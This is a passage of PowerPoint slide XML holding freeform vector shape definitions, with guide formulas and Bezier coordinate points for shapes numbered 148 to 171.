                      <a:pt x="68" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12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Freeform 148"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6574"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Freeform 149"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6769"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Freeform 150"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6966"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4" name="Freeform 151"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7114"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Freeform 152"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7312"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Freeform 153"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7454" y="4027"/>
                <a:ext cx="76" cy="294"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 63 w 63"/>
                  <a:gd name="T1" fmla="*/ 241 h 241"/>
                  <a:gd name="T2" fmla="*/ 21 w 63"/>
                  <a:gd name="T3" fmla="*/ 199 h 241"/>
                  <a:gd name="T4" fmla="*/ 21 w 63"/>
                  <a:gd name="T5" fmla="*/ 158 h 241"/>
                  <a:gd name="T6" fmla="*/ 0 w 63"/>
                  <a:gd name="T7" fmla="*/ 129 h 241"/>
                  <a:gd name="T8" fmla="*/ 0 w 63"/>
                  <a:gd name="T9" fmla="*/ 113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7 w 63"/>
                  <a:gd name="T31" fmla="*/ 217 h 241"/>
                  <a:gd name="T32" fmla="*/ 63 w 63"/>
                  <a:gd name="T33" fmla="*/ 224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1"/>
                      <a:pt x="21" y="227"/>
                      <a:pt x="21" y="199"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="158"/>
                      <a:pt x="21" y="158"/>
                      <a:pt x="21" y="158"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="139"/>
                      <a:pt x="14" y="130"/>
                      <a:pt x="0" y="129"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="113"/>
                      <a:pt x="0" y="113"/>
                      <a:pt x="0" y="113"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="112"/>
                      <a:pt x="21" y="102"/>
                      <a:pt x="21" y="83"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="43"/>
                      <a:pt x="21" y="43"/>
                      <a:pt x="21" y="43"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="15"/>
                      <a:pt x="35" y="1"/>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7"/>
                      <a:pt x="42" y="156"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="42" y="195"/>
                      <a:pt x="42" y="195"/>
                      <a:pt x="42" y="195"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="42" y="205"/>
                      <a:pt x="43" y="213"/>
                      <a:pt x="47" y="217"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="50" y="221"/>
                      <a:pt x="55" y="224"/>
                      <a:pt x="63" y="224"/>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Freeform 154"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7562" y="4027"/>
                <a:ext cx="77" cy="294"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 63 w 63"/>
                  <a:gd name="T1" fmla="*/ 129 h 241"/>
                  <a:gd name="T2" fmla="*/ 41 w 63"/>
                  <a:gd name="T3" fmla="*/ 158 h 241"/>
                  <a:gd name="T4" fmla="*/ 41 w 63"/>
                  <a:gd name="T5" fmla="*/ 199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9"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="48" y="130"/>
                      <a:pt x="41" y="139"/>
                      <a:pt x="41" y="158"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="199"/>
                      <a:pt x="41" y="199"/>
                      <a:pt x="41" y="199"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="227"/>
                      <a:pt x="27" y="241"/>
                      <a:pt x="0" y="241"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="224"/>
                      <a:pt x="0" y="224"/>
                      <a:pt x="0" y="224"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="224"/>
                      <a:pt x="13" y="221"/>
                      <a:pt x="16" y="217"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="20" y="213"/>
                      <a:pt x="21" y="205"/>
                      <a:pt x="21" y="195"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="156"/>
                      <a:pt x="21" y="156"/>
                      <a:pt x="21" y="156"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="137"/>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8" y="112"/>
                      <a:pt x="63" y="113"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="63"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Freeform 155"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7669"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Freeform 156"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2581" y="401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0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="172" y="171"/>
                      <a:pt x="174" y="172"/>
                      <a:pt x="175" y="174"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="179" y="176"/>
                      <a:pt x="179" y="180"/>
                      <a:pt x="176" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="173" y="186"/>
                      <a:pt x="170" y="187"/>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199"/>
                      <a:pt x="113" y="198"/>
                      <a:pt x="110" y="198"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="198"/>
                      <a:pt x="90" y="198"/>
                      <a:pt x="81" y="198"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="76" y="198"/>
                      <a:pt x="72" y="199"/>
                      <a:pt x="68" y="201"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="203"/>
                      <a:pt x="64" y="204"/>
                      <a:pt x="63" y="205"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="208"/>
                      <a:pt x="54"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5" y="176"/>
                      <a:pt x="3" y="172"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="170"/>
                      <a:pt x="2" y="168"/>
                      <a:pt x="2" y="166"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="162"/>
                      <a:pt x="3" y="160"/>
                      <a:pt x="7" y="160"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10" y="160"/>
                      <a:pt x="12" y="159"/>
                      <a:pt x="14" y="159"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19" y="158"/>
                      <a:pt x="22" y="155"/>
                      <a:pt x="23" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="150"/>
                      <a:pt x="23" y="149"/>
                      <a:pt x="23" y="149"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="25" y="153"/>
                      <a:pt x="23" y="160"/>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80"/>
                      <a:pt x="6" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="185"/>
                      <a:pt x="5" y="186"/>
                      <a:pt x="5" y="188"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="190"/>
                      <a:pt x="4" y="191"/>
                      <a:pt x="7" y="192"/>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0"/>
                      <a:pt x="42" y="152"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="40" y="149"/>
                      <a:pt x="37" y="147"/>
                      <a:pt x="35" y="145"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="32" y="143"/>
                      <a:pt x="30" y="143"/>
                      <a:pt x="27" y="144"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="145"/>
                      <a:pt x="25" y="145"/>
                      <a:pt x="25" y="143"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="24" y="140"/>
                      <a:pt x="24" y="137"/>
                      <a:pt x="25" y="134"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="132"/>
                      <a:pt x="26" y="131"/>
                      <a:pt x="27" y="130"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="30" y="125"/>
                      <a:pt x="33" y="118"/>
                      <a:pt x="35" y="112"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="106"/>
                      <a:pt x="39" y="100"/>
                      <a:pt x="43" y="94"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="90"/>
                      <a:pt x="49" y="87"/>
                      <a:pt x="52" y="83"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="54" y="80"/>
                      <a:pt x="56" y="76"/>
                      <a:pt x="58" y="73"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="60" y="70"/>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3"/>
                      <a:pt x="122" y="30"/>
                      <a:pt x="122" y="36"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="123" y="40"/>
                      <a:pt x="122" y="43"/>
                      <a:pt x="123" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="124" y="61"/>
                      <a:pt x="128" y="74"/>
                      <a:pt x="139"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4" y="160"/>
                      <a:pt x="139" y="161"/>
                      <a:pt x="135" y="159"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="133" y="159"/>
                      <a:pt x="132" y="157"/>
                      <a:pt x="131" y="155"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="130" y="154"/>
                      <a:pt x="129" y="152"/>
                      <a:pt x="128" y="150"/>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2" y="189"/>
                      <a:pt x="121" y="191"/>
                      <a:pt x="122" y="194"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="123" y="201"/>
                      <a:pt x="129" y="205"/>
                      <a:pt x="136" y="202"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="139" y="201"/>
                      <a:pt x="142" y="199"/>
                      <a:pt x="145" y="197"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="151" y="192"/>
                      <a:pt x="158" y="189"/>
                      <a:pt x="165" y="186"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="168" y="185"/>
                      <a:pt x="171" y="184"/>
                      <a:pt x="173" y="182"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="174" y="182"/>
                      <a:pt x="174" y="181"/>
                      <a:pt x="175" y="181"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="176" y="180"/>
                      <a:pt x="176" y="178"/>
                      <a:pt x="175" y="177"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="174" y="176"/>
                      <a:pt x="172" y="175"/>
                      <a:pt x="171" y="174"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="170" y="173"/>
                      <a:pt x="169" y="173"/>
                      <a:pt x="168" y="172"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="163" y="171"/>
                      <a:pt x="161" y="168"/>
                      <a:pt x="160" y="163"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="160" y="160"/>
                      <a:pt x="160" y="158"/>
                      <a:pt x="160" y="155"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="160" y="154"/>
                      <a:pt x="160" y="154"/>
                      <a:pt x="161" y="153"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="71" y="69"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="69"/>
                      <a:pt x="71" y="69"/>
                      <a:pt x="71" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="71"/>
                      <a:pt x="74" y="73"/>
                      <a:pt x="77" y="73"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="81" y="74"/>
                      <a:pt x="85" y="73"/>
                      <a:pt x="88" y="71"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="70"/>
                      <a:pt x="94" y="68"/>
                      <a:pt x="98" y="67"/>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2"/>
                      <a:pt x="37" y="122"/>
                      <a:pt x="37" y="123"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="35" y="127"/>
                      <a:pt x="35" y="131"/>
                      <a:pt x="37" y="135"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="138"/>
                      <a:pt x="38" y="140"/>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7"/>
                      <a:pt x="63" y="178"/>
                      <a:pt x="62" y="178"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="180"/>
                      <a:pt x="65" y="181"/>
                      <a:pt x="66" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="186"/>
                      <a:pt x="69" y="189"/>
                      <a:pt x="69" y="192"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="194"/>
                      <a:pt x="70" y="195"/>
                      <a:pt x="70" y="197"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="197"/>
                      <a:pt x="70" y="197"/>
                      <a:pt x="71" y="197"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="195"/>
                      <a:pt x="73" y="193"/>
                      <a:pt x="72" y="191"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="188"/>
                      <a:pt x="70" y="186"/>
                      <a:pt x="69" y="184"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="184"/>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4"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="114" y="173"/>
                      <a:pt x="115" y="172"/>
                      <a:pt x="116" y="173"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="116" y="173"/>
                      <a:pt x="117"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8"/>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7"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4"/>
                      <a:pt x="139" y="131"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="138" y="135"/>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2"/>
                      <a:pt x="97" y="51"/>
                      <a:pt x="94" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="49"/>
                      <a:pt x="91" y="47"/>
                      <a:pt x="91" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="43"/>
                      <a:pt x="91" y="42"/>
                      <a:pt x="92" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="93" y="37"/>
                      <a:pt x="95" y="36"/>
                      <a:pt x="98" y="37"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="37"/>
                      <a:pt x="101" y="38"/>
                      <a:pt x="102" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="42"/>
                      <a:pt x="103" y="45"/>
                      <a:pt x="102" y="48"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="102" y="49"/>
                      <a:pt x="101" y="49"/>
                      <a:pt x="102" y="50"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="104" y="51"/>
                      <a:pt x="107" y="50"/>
                      <a:pt x="107" y="48"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="108" y="44"/>
                      <a:pt x="107" y="39"/>
                      <a:pt x="105" y="35"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="104" y="32"/>
                      <a:pt x="100" y="29"/>
                      <a:pt x="96" y="30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="30"/>
                      <a:pt x="88" y="33"/>
                      <a:pt x="87" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="87" y="39"/>
                      <a:pt x="87" y="40"/>
                      <a:pt x="87" y="42"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="87" y="43"/>
                      <a:pt x="87" y="45"/>
                      <a:pt x="87" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="85" y="45"/>
                      <a:pt x="83" y="46"/>
                      <a:pt x="81" y="46"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="80" y="46"/>
                      <a:pt x="80" y="46"/>
                      <a:pt x="80" y="46"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="78" y="46"/>
                      <a:pt x="78" y="45"/>
                      <a:pt x="78" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="77" y="41"/>
                      <a:pt x="77" y="39"/>
                      <a:pt x="76" y="36"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="76" y="35"/>
                      <a:pt x="76" y="35"/>
                      <a:pt x="76" y="34"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="75" y="32"/>
                      <a:pt x="73" y="31"/>
                      <a:pt x="70" y="31"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="31"/>
                      <a:pt x="67" y="32"/>
                      <a:pt x="66" y="34"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="40"/>
                      <a:pt x="63" y="45"/>
                      <a:pt x="66" y="50"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="50"/>
                      <a:pt x="67" y="51"/>
                      <a:pt x="68" y="51"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="51"/>
                      <a:pt x="69" y="50"/>
                      <a:pt x="70" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="48"/>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1" y="66"/>
                      <a:pt x="74" y="66"/>
                      <a:pt x="78" y="66"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="82" y="66"/>
                      <a:pt x="87" y="65"/>
                      <a:pt x="91" y="63"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="95" y="62"/>
                      <a:pt x="98" y="62"/>
                      <a:pt x="101" y="58"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="58"/>
                      <a:pt x="102" y="58"/>
                      <a:pt x="103" y="58"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="58"/>
                      <a:pt x="103" y="60"/>
                      <a:pt x="103" y="60"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="61"/>
                      <a:pt x="102" y="61"/>
                      <a:pt x="102" y="61"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="97" y="63"/>
                      <a:pt x="92" y="65"/>
                      <a:pt x="86" y="67"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="83" y="69"/>
                      <a:pt x="79" y="70"/>
                      <a:pt x="74" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="69"/>
                      <a:pt x="72" y="69"/>
                      <a:pt x="71" y="69"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="73" y="45"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="43"/>
                      <a:pt x="73" y="41"/>
                      <a:pt x="72" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="40"/>
                      <a:pt x="71" y="40"/>
                      <a:pt x="71" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="40"/>
                      <a:pt x="70" y="41"/>
                      <a:pt x="70" y="41"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="41"/>
                      <a:pt x="72" y="43"/>
                      <a:pt x="72" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="44"/>
                      <a:pt x="72" y="45"/>
                      <a:pt x="73" y="45"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="97" y="39"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="99" y="40"/>
                      <a:pt x="99" y="42"/>
                      <a:pt x="100" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="43"/>
                      <a:pt x="101" y="43"/>
                      <a:pt x="101" y="43"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="41"/>
                      <a:pt x="100" y="40"/>
                      <a:pt x="99"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Freeform 157"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2672" y="407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Freeform 158"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2684" y="4073"/>
                <a:ext cx="5" cy="2"/>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Freeform 159"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2043"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Freeform 160"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2193"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Freeform 161"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2342" y="2562"/>
                <a:ext cx="82"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Freeform 162"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="249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Freeform 163"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2687"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Freeform 164"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2837"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8" name="Freeform 165"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="298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Freeform 166"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3182"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Freeform 167"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3332"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3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="46"/>
                      <a:pt x="18" y="48"/>
                      <a:pt x="14"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Freeform 168"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="371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Freeform 169"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3905"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Freeform 170"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="410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2" y="36"/>
                      <a:pt x="17" y="27"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="18"/>
                      <a:pt x="30" y="11"/>
                      <a:pt x="38" y="7"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="2"/>
                      <a:pt x="55"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Freeform 171"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4285" y="2567"/>
                <a:ext cx="189" cy="219"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 189 w 189"/>
                  <a:gd name="T1" fmla="*/ 68 h 219"/>
                  <a:gd name="T2" fmla="*/ 184 w 189"/>
                  <a:gd name="T3" fmla="*/ 86 h 219"/>
                  <a:gd name="T4" fmla="*/ 141 w 189"/>
                  <a:gd name="T5" fmla="*/ 86 h 219"/>
                  <a:gd name="T6" fmla="*/ 130 w 189"/>
                  <a:gd name="T7" fmla="*/ 136 h 219"/>
                  <a:gd name="T8" fmla="*/ 178 w 189"/>
                  <a:gd name="T9" fmla="*/ 136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3 w 189"/>
                  <a:gd name="T31" fmla="*/ 136 h 219"/>
                  <a:gd name="T32" fmla="*/ 48 w 189"/>
                  <a:gd name="T33" fmla="*/ 136 h 219"/>
                  <a:gd name="T34" fmla="*/ 57 w 189"/>
                  <a:gd name="T35" fmla="*/ 86 h 219"/>
                  <a:gd name="T36" fmla="*/ 11 w 189"/>
                  <a:gd name="T37" fmla="*/ 86 h 219"/>
                  <a:gd name="T38" fmla="*/ 15 w 189"/>
                  <a:gd name="T39" fmla="*/ 68 h 219"/>
                  <a:gd name="T40" fmla="*/ 61 w 189"/>
                  <a:gd name="T41" fmla="*/ 68 h 219"/>
                  <a:gd name="T42" fmla="*/ 74 w 189"/>
                  <a:gd name="T43" fmla="*/ 0 h 219"/>
                  <a:gd name="T44" fmla="*/ 96 w 189"/>
                  <a:gd name="T45" fmla="*/ 0 h 219"/>
                  <a:gd name="T46" fmla="*/ 82 w 189"/>
                  <a:gd name="T47" fmla="*/ 68 h 219"/>
                  <a:gd name="T48" fmla="*/ 124 w 189"/>
                  <a:gd name="T49" fmla="*/ 68 h 219"/>
                  <a:gd name="T50" fmla="*/ 138 w 189"/>
                  <a:gd name="T51" fmla="*/ 0 h 219"/>
                  <a:gd name="T52" fmla="*/ 159 w 189"/>
                  <a:gd name="T53" fmla="*/ 0 h 219"/>
                  <a:gd name="T54" fmla="*/ 145 w 189"/>
                  <a:gd name="T55" fmla="*/ 68 h 219"/>
                  <a:gd name="T56" fmla="*/ 189 w 189"/>
                  <a:gd name="T57" fmla="*/ 68 h 219"/>
                  <a:gd name="T58" fmla="*/ 121 w 189"/>
                  <a:gd name="T59" fmla="*/ 86 h 219"/>
                  <a:gd name="T60" fmla="*/ 78 w 189"/>
                  <a:gd name="T61" fmla="*/ 86 h 219"/>
                  <a:gd name="T62" fmla="*/ 67 w 189"/>
                  <a:gd name="T63" fmla="*/ 136 h 219"/>
                  <a:gd name="T64" fmla="*/ 110 w 189"/>
                  <a:gd name="T65" fmla="*/ 136 h 219"/>
                  <a:gd name="T66" fmla="*/ 121 w 189"/>
                  <a:gd name="T67" fmla="*/ 8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8"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="184" y="86"/>
                    </a:lnTo>
